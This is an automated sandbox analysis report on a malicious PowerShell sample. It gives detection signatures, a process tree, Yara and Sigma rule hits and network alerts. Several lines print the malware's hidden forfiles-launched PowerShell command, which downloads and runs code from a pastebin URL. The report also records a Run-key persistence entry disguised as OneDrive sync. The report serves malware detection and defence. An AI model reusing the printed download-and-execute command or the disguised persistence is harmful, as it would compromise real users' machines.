Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cr_asm3.ps1

Overview

General Information

Sample name:cr_asm3.ps1
Analysis ID:1534234
MD5:b1e2bf28f0bb077edc92a81173ccbbfa
SHA1:425c6a7ae95888820b4411730475fa9b19cdb6f3
SHA256:682551bed0e0e7aaba3274d84d5fc80a04b926ac1e4a78e5e312eb2ffd7a5012
Tags:Neth3Nps1user-JAMESWT_MHT
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to inject threads in other processes
Powershell creates an autostart link
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 2120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 2980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • Stand_Trainer_Updated.exe (PID: 4504 cmdline: "C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe" MD5: BECD67D75C5E7C2411E9F481086CA1E0)
    • attrib.exe (PID: 7588 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • svchost.exe (PID: 6524 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • forfiles.exe (PID: 7396 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7468 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 7764 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7832 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6648INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x78507:$b1: ::WriteAllBytes(
  • 0xdc8ba:$s1: -join
  • 0xdc8f5:$s1: -join
  • 0xdc9bc:$s1: -join
  • 0xdc9ea:$s1: -join
  • 0xdcba6:$s1: -join
  • 0xdcbc9:$s1: -join
  • 0xdce7d:$s1: -join
  • 0xdce9e:$s1: -join
  • 0xdced0:$s1: -join
  • 0xdcf18:$s1: -join
  • 0xdcf45:$s1: -join
  • 0xdcf6c:$s1: -join
  • 0xdcf9d:$s1: -join
  • 0xdcfbf:$s1: -join
  • 0xdd08c:$s1: -join
  • 0xdd520:$s1: -join
  • 0xdd542:$s1: -join
  • 0xdd59a:$s1: -join
  • 0xdd5c4:$s1: -join
  • 0xdd5f8:$s1: -join
Process Memory Space: powershell.exe PID: 7548INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9f5f4:$b1: ::WriteAllBytes(
  • 0xe5652:$b1: ::WriteAllBytes(
  • 0x8215e:$s1: -join
  • 0x828bf:$s1: -join
  • 0x11e1c4:$s1: -join
  • 0x16bc06:$s1: -join
  • 0xdeb9:$s3: reverse
  • 0x127f3:$s3: reverse
  • 0x1c615:$s3: reverse
  • 0x27fc6:$s3: reverse
  • 0x57278:$s3: reverse
  • 0x5deac:$s3: reverse
  • 0x5ff99:$s3: reverse
  • 0x6afc8:$s3: reverse
  • 0xbd545:$s3: reverse
  • 0xbd833:$s3: reverse
  • 0xbdf4d:$s3: reverse
  • 0xbe706:$s3: reverse
  • 0xc5954:$s3: reverse
  • 0xc5d6e:$s3: reverse
  • 0xc68f6:$s3: reverse
Process Memory Space: powershell.exe PID: 7912INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2bc1e:$b1: ::WriteAllBytes(
  • 0x88b08:$b1: ::WriteAllBytes(
  • 0x34b73:$s1: -join
  • 0x551ea:$s1: -join
  • 0x192066:$s1: -join
  • 0x1927c6:$s1: -join
  • 0xa34ed:$s3: reverse
  • 0xad523:$s3: reverse
  • 0xe0ac5:$s3: reverse
  • 0xec1fe:$s3: reverse
  • 0x10d32b:$s3: reverse
  • 0x113fad:$s3: reverse
  • 0x115e40:$s3: reverse
  • 0x120e6f:$s3: reverse
  • 0x13eb44:$s3: reverse
  • 0x13ee32:$s3: reverse
  • 0x13f54c:$s3: reverse
  • 0x13fd05:$s3: reverse
  • 0x146c43:$s3: reverse
  • 0x14705d:$s3: reverse
  • 0x147be5:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_7548.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_7912.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7396, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 7468, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", ProcessId: 6648, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", ProcessId: 2120, ProcessName: csc.exe
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 2120, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP", ProcessId: 2980, ProcessName: cvtres.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6648, TargetFilename: C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", ProcessId: 6648, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6524, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", ProcessId: 2120, ProcessName: csc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:08:12.766333+020028032742Potentially Bad Traffic192.168.2.749703185.199.109.133443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:08:42.150593+020028576591A Network Trojan was detected192.168.2.749852162.159.138.232443TCP
2024-10-15T18:08:49.372385+020028576591A Network Trojan was detected192.168.2.749889162.159.138.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:08:27.991660+020028576581A Network Trojan was detected192.168.2.749775162.159.138.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49810 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49821 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49852 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49889 version: TLS 1.2
Source: Binary string: \??\C:\Windows\mscorlib.pdbl] source: powershell.exe, 0000000C.00000002.1746802564.000002927D9E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000C.00000002.1746099211.000002927D9A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll\YC source: powershell.exe, 00000001.00000002.1549184232.0000026CA95F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb4e089 source: powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000011.00000002.1844743189.000002409836A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbAf9(@ source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.pdbhP source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb$ source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb] source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbw source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.pdb source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1549184232.0000026CA95E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1746099211.000002927D9D7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1745296458.000002927D952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbk source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbG source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb: source: powershell.exe, 00000001.00000002.1549184232.0000026CA96D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbl source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb? source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbY source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs source: powershell.exe, 00000001.00000002.1549184232.0000026CA96D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbpw source: powershell.exe, 00000001.00000002.1549184232.0000026CA95F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdbc source: powershell.exe, 00000001.00000002.1549184232.0000026CA95E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb9 source: powershell.exe, 00000011.00000002.1844743189.000002409836A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1745296458.000002927D952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1844743189.000002409836E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdbA* source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000C.00000002.1745296458.000002927D966000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationib.pdb source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbp; source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbc source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp
